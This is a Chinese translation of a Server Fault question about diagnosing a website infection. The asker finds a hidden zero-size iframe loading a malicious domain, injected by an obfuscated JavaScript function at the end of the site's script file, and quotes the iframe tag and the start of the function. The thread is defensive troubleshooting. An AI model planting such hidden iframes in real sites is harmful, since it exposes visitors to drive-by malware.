Security

如何測試網站是否感染了惡意軟體?

  • September 3, 2009

我的一些朋友有一個網站 (www.kennelsoffie.dk),我會在遇到任何問題時幫助他們。然而這一次,我想不通。當我使用 Google Chrome 訪問該站點時,我看到一個警告頁面,聲稱我嘗試訪問的頁麵包含來自 stopsse.info 的元素。

我不知道任何 PHP,所以我只是下載了完整的網站,包括數據庫的備份(即 .sql 文件)。然後,我在所有文件中搜尋了stopssse,但沒有找到任何東西。

我還使用 siteadvisor.com 測試了該網站,它說“我們測試了這個網站,沒有發現任何重大問題”。

PHP 可以隱藏對惡意軟體站點的引用,因此我無法通過簡單的搜尋找到它嗎?如果是這樣,你怎麼能找到它?

我在生成的源中找到了這個

<iframe height="0" width="0" src="http://stopssse.info/l.php?thx" style="display: none; visibility: hidden;">

它就在body標籤的正下方,不在實際的頁面原始碼中,它是由混淆的javascript添加的

編輯:如果您查看http://www.kennelsoffie.dk/includes/jscript.js的底部,您會看到一個看起來非常奇怪的 javascript 函式。這就是我告訴你的混淆的 javascript 函式。它開始於

function lIIlOlIllI1000llII10l0OIIIlIOlIOI1O010l0(O00I10I0l00I0IOIO1Ol10O0Ol1Il1lI10OI00Il){var

最好的辦法是找到並刪除它。

引用自:https://serverfault.com/questions/61104